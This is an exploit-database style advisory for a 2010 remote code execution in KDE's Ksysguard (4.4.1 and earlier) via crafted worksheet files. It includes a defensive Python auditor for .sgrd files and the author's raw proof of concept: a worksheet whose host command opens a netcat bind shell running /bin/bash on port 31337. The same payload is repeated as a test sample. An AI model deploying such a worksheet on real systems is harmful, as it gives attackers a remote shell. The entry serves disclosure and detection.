Vendor: Ksysguard
By: Emanuele 'emgent' Gentili
CVSS: 8.8 (HIGH)
Type: Remote Code Execution
CWE: 79
Product Name: Ksysguard
Affected Version From: <= 4.4.1
Affected Version To: <= 4.4.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:kde:ksysguard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2010

Ksysguard RCE via Cross Application Scripting

Ksysguard is vulnerable to Cross Application Scripting (CAS), which allows an attacker to execute arbitrary code on the target system. The exploit provided by the author is a worksheet file, ph33r.sgrd, whose <host> element carries a command attribute that opens a netcat listener on port 31337 and executes a bash shell. The vulnerability affects Ksysguard versions up to and including 4.4.1.

Mitigation:

The vendor has released a patch to address this vulnerability.
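
One way to check worksheet files before they are opened, added here as an example and not code from the exploit author or from KDE: it parses a .sgrd file and reports every <host> command that would start something other than ksysguardd. The allowlist, the function name audit_worksheet and the benign sample are assumptions.

```python
import shlex
import xml.etree.ElementTree as ET

# Assumption: a benign worksheet leaves command empty or starts ksysguardd.
ALLOWED_BINARIES = {"ksysguardd"}
SHELL_METACHARS = set(";|&`$<>\n")

# Constructed benign sample (its attribute values are assumptions).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="Load" interval="2" locked="0" rows="2" columns="2">
<host name="localhost" command="ksysguardd" /> </WorkSheet>"""

# The worksheet shown in the raw data on this page.
SUSPECT = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>"""


def audit_worksheet(xml_text):
    """Return a list of (command, reason) findings for one worksheet."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("", "unparseable worksheet: %s" % exc)]
    findings = []
    for host in root.iter("host"):
        command = (host.get("command") or "").strip()
        if not command:
            continue  # no custom command to launch
        if SHELL_METACHARS & set(command):
            findings.append((command, "shell metacharacters in command"))
            continue
        try:
            argv = shlex.split(command)
        except ValueError:
            findings.append((command, "unbalanced quoting in command"))
            continue
        binary = argv[0].rsplit("/", 1)[-1]  # compare on the basename
        if binary not in ALLOWED_BINARIES:
            findings.append((command, "unexpected binary: " + binary))
    return findings


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, audit_worksheet(doc))
```

A worksheet with any finding should be treated as untrusted and not opened in an unpatched Ksysguard.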

Exploit-DB raw data:

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting 
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting



halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$